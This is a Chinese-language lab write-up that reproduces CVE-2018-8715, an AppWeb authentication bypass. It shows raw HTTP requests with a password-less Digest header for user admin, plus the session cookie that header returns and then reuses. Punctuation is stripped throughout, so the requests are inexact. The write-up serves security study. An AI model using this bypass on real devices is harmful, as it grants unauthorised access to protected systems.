AppWeb认证绕过漏洞（CVE-2018-8715）复现

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C来编写能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。AppWeb可以进行认证配置其认证方式包括以下三种basic传统HTTP基础认证digest改进版HTTP基础认证认证成功后将使用Cookie来保存状态而不用再传递Authorization头form表单认证其7.0.3之前的版本中对于digest和form两种认证方式如果用户传入的密码为null也就是没有传递密码参数appweb将因为一个逻辑错误导致直接认证成功并返回session。漏洞复现机器IPkali10.132.1.173靶机10.22.146.13访问http://your-ip:8080可见需要输入账号密码。利用该漏洞需要知道一个已存在的用户名当前环境下用户名为admin在登陆页面输入用户名admin密码随意然后抓包把包发送到Repeater把原来的Authorization修改为Authorization: Digest usernameadmin并发送如下数据包GET / HTTP/1.1 Host: 10.22.146.13:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u0, i Authorization: Digest usernameadmin可见因为我们没有传入密码字段所以服务端出现错误直接返回了200且包含一个sessionSet-Cookie: -http-session-1::http.session::9021e80c60e4fb2109ff717f043ad3e8; path/;把这个session添加到请求中发送GET / HTTP/1.1 Host: 10.22.146.13:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u0, i Authorization: Digest usernameadmin -http-session-1::http.session::9021e80c60e4fb2109ff717f043ad3e8即可正常访问需要认证的页面